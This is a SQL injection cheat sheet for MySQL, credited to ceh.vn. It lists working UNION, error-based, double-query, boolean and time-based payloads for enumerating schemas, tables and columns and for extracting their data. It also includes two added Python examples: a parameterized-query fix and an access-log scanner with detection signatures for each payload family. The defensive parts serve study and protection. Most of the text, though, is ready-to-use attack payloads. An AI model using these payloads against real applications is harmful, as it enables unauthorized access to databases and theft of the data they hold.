UNION

UNION is used to append the SQL injection query to a legitimate query and combine the information we want to retrieve with the results of the legitimate query. Note that you first need to determine the number of columns, which can be done with ORDER BY or by using UNION with NULL values.

Assuming there are two columns:

Retrieve the database version:

1 UNION ALL SELECT NULL,version()--

Retrieve database names:
1 UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata--

Retrieve table names:
1 UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='database1'--

Retrieve column names:
1 UNION ALL SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'--

Retrieve data:
1 UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM table1--

Retrieve data from another database:

1 UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM database2.table1--
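The following is an added example, not part of the original cheat sheet, showing why the UNION technique above works and how a parameterized query stops it. It uses an in-memory SQLite database in place of MySQL (an assumption made for portability), with sqlite_version() standing in for MySQL's version(); the products table and its rows are constructed for the demo.

```python
import sqlite3

# The UNION payload from the cheat sheet, with sqlite_version() substituted for
# MySQL's version() because this demo runs on SQLite (assumption).
PAYLOAD = "1 UNION ALL SELECT NULL,sqlite_version()--"


def make_db():
    """Constructed two-column table so the payload's column count matches."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    return conn


def lookup_vulnerable(conn, user_input):
    # Vulnerable pattern: the untrusted value is pasted into the SQL text, so the
    # caller controls the statement structure and can append a second SELECT.
    sql = f"SELECT id, name FROM products WHERE id = {user_input}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    # Hardened pattern: the value is bound as a parameter. The whole string is
    # compared against id as data; it can never be parsed as SQL.
    sql = "SELECT id, name FROM products WHERE id = ?"
    return conn.execute(sql, (user_input,)).fetchall()


def engine_version(conn):
    """Helper so a caller can check what the injected row leaked."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized:", lookup_parameterized(db, PAYLOAD))
    print("parameterized, benign input:", lookup_parameterized(db, "1"))
```

With the vulnerable function the result set contains the legitimate row followed by a second row whose second column is the engine version, exactly the leakage the cheat sheet describes; the parameterized function returns no rows for the payload and the correct row for a benign id.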

Error Based

When there is no output except a MySQL error, you can force your data extraction through the error. Note that both of the below methods can be easily automated using Burp’s Intruder and the grep extract functionality.

XPath

The ExtractValue() function generates a SQL error when it is unable to parse the XML data passed to it. Fortunately, the XML data, and, in our case, the evaluated results of our SQL query, will be embedded into the subsequent error message. Prepending a full stop or a colon (we use the hex representation 0x3a below) to the beginning of the XML query will ensure the parsing always fails, thus generating an error containing our extracted data. Note that this only works on MySQL version 5.1 or later. Use the LIMIT clause to cycle through database information.

Retrieve the database version:
1 AND extractvalue(rand(),concat(0x3a,version()))--

Retrieve database names:
1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 0,1)))--

Retrieve table names:
1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1)))--

Retrieve column names:
1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1)))--

Retrieve data:
1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(column1,0x3a,column2) FROM table1 LIMIT 0,1)))--

Retrieve data from another database:
1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(column1,0x3a,column2) FROM database2.table1 LIMIT 0,1)))--


Double Query


The functions used below combine to produce a query which is accepted by the MySQL compiler but errors at runtime. The error is then returned, but it evaluates and includes the subquery (due to the double select), thus returning the results of our injection to the page. Increment the first LIMIT to cycle through the database information.

Retrieve the database version:
1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--

Retrieve database names:
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT schema_name FROM information_schema.schemata LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.schemata GROUP BY a LIMIT 0,1)b)--

Retrieve table names:
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.TABLES GROUP BY a LIMIT 0,1)b)--

Retrieve column names:
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)--

Retrieve data:
1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--

Retrieve data from another database:
1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT column1 FROM database2.table1 LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--

Inferential


When no data or error messages are returned, you can use time delays or true/false responses to retrieve database information. Note that automated tools such as sqlmap significantly speed up the process.

Boolean


This type of extraction is used when the application returns differing results depending on whether the SQL query we inject evaluates to true or false. If we convert each individual character of the piece of database information we wish to retrieve to its decimal representation using the ASCII function (consult an ASCII table), we can create true or false conditions using the greater-than, less-than and equals operators. We can then cycle through the individual characters using the SUBSTRING function and through the pieces of database information using the LIMIT clause.

Test for the presence of the vulnerability. This query should result in the original page being displayed:

1 AND 1=1

Whilst this query should return a different page:

1 AND 1=2

Retrieve the version:
1 AND (ascii(substr((SELECT version()),1,1))) > 52--

Note, a better way to retrieve the version in this context is to use the LIKE function:
1 AND (SELECT version()) LIKE "5%"--

Retrieve databases:
1 AND (ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1))) > 95--

Retrieve tables:
1 AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),1,1))) > 95--

Retrieve columns:
1 AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),1,1))) > 95--

Retrieve data:
1 AND (ascii(substr((SELECT column1 FROM table1 LIMIT 0,1),1,1))) > 95--

Retrieve data from another database:
1 AND (ascii(substr((SELECT column1 FROM database2.table1 LIMIT 0,1),1,1))) > 95--


Time Based


If identical pages are returned for true or false responses, time delays can be created by the IF and SLEEP functions and used to deduce database information instead.

Test for the vulnerability:
1 AND sleep(10)--

Retrieve the version:
1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)--

Retrieve the version using LIKE:
1 AND IF((SELECT version()) LIKE "5%",sleep(10),NULL)--

Retrieve databases:
1 AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--

Retrieve tables:
1 AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="database1" LIMIT 0,1),1,1))))> 95,sleep(10),NULL)--

Retrieve columns:
1 AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--

Retrieve data:
1 AND IF(((ascii(substr((SELECT column1 FROM table1 LIMIT 0,1),1,1)))) > 95,sleep(10),NULL)--

Retrieve data from another database:
1 AND IF(((ascii(substr((SELECT column1 FROM database2.table1 LIMIT 0,1),1,1)))) >95,sleep(10),NULL)--
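As an added example from the detection side (not part of the original cheat sheet), the script below scans web-server access log lines for the payload families covered in the UNION, Error Based, Double Query, Boolean and Time Based sections above. The log lines are constructed for the demo; the query string is URL-decoded before matching because the signatures in the cheat sheet (UNION ... SELECT, extractvalue(), the COUNT(*)/FLOOR(rand(0)*2)/GROUP BY combination, numeric AND x=y probes, sleep(), and information_schema lookups) only appear in clear text after decoding.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines: method, request target, status code.
SAMPLE_LOG = """\
GET /item.php?id=1 200
GET /item.php?id=1%20UNION%20ALL%20SELECT%20NULL,version()-- 200
GET /item.php?id=1%20AND%20extractvalue(rand(),concat(0x3a,version()))-- 500
GET /item.php?id=1%20AND(SELECT%201%20FROM(SELECT%20COUNT(*),concat(version(),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)-- 500
GET /item.php?id=1%20AND%201%3D2 200
GET /item.php?id=1%20AND%20IF((SELECT%20version())%20LIKE%20%225%25%22,sleep(10),NULL)-- 200
GET /search.php?q=union+station 200
"""

# One signature per technique family from the cheat sheet. Matching is
# case-insensitive and tolerant of the spacing variants the payloads use
# (e.g. "AND(" without a space in the double-query form).
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("error_xpath", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("error_double_query",
     re.compile(r"\bcount\(\*\).*floor\(\s*rand\(0\)\s*\*\s*2\s*\).*group\s+by\b", re.I | re.S)),
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I)),
    ("time_based", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(schemata|tables|columns)\b", re.I)),
]


def classify(query_string):
    """Return the names of every signature that matches the decoded query string."""
    decoded = unquote_plus(query_string)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text):
    """Yield (request_target, status, matched_signatures) for suspicious lines only."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _method, target, status = line.split()
        _path, _sep, qs = target.partition("?")
        hits = classify(qs)
        if hits:
            findings.append((target, status, hits))
    return findings


if __name__ == "__main__":
    for target, status, hits in scan_log(SAMPLE_LOG):
        print(status, ",".join(hits), target)
```

The benign "union station" search does not trigger the UNION signature because that rule requires a following SELECT; error-based payloads are additionally correlated with 500 responses, which is a useful second signal when the application surfaces database errors.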


Source: ceh.vn
